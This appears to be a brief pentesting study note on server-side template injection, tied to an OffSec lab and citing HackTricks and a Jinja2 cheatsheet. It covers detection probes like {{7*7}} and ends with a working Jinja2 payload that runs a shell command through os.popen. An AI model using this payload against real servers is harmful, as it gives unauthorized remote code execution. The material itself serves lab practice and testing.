x

Server-Side Template Injection

https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/index.html
https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti
offsec pg - layla

Test initially with simple query entries to the template, analyse the server's response and look for:

  • Thrown errors, revealing the vulnerability and potentially the template engine.
  • Absence of the payload in the reflection, or parts of it missing, implying the server processes it differently than regular data.
  • Plaintext Context: Distinguish from XSS by checking if the server evaluates template expressions (e.g., {{7*7}}${7*7}).
  • Code Context: Confirm vulnerability by altering input parameters. For instance, changing greeting in http://vulnerable-website.com/?greeting=data.username to see if the server's output is dynamic or fixed, like in greeting=data.username}}hello returning the username. 
{{7*7}}

Use this wordlist to test the template further:
https://github.com/payloadbox/ssti-payloads 

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
Left-click: follow link, Right-click: select node, Scroll: zoom
x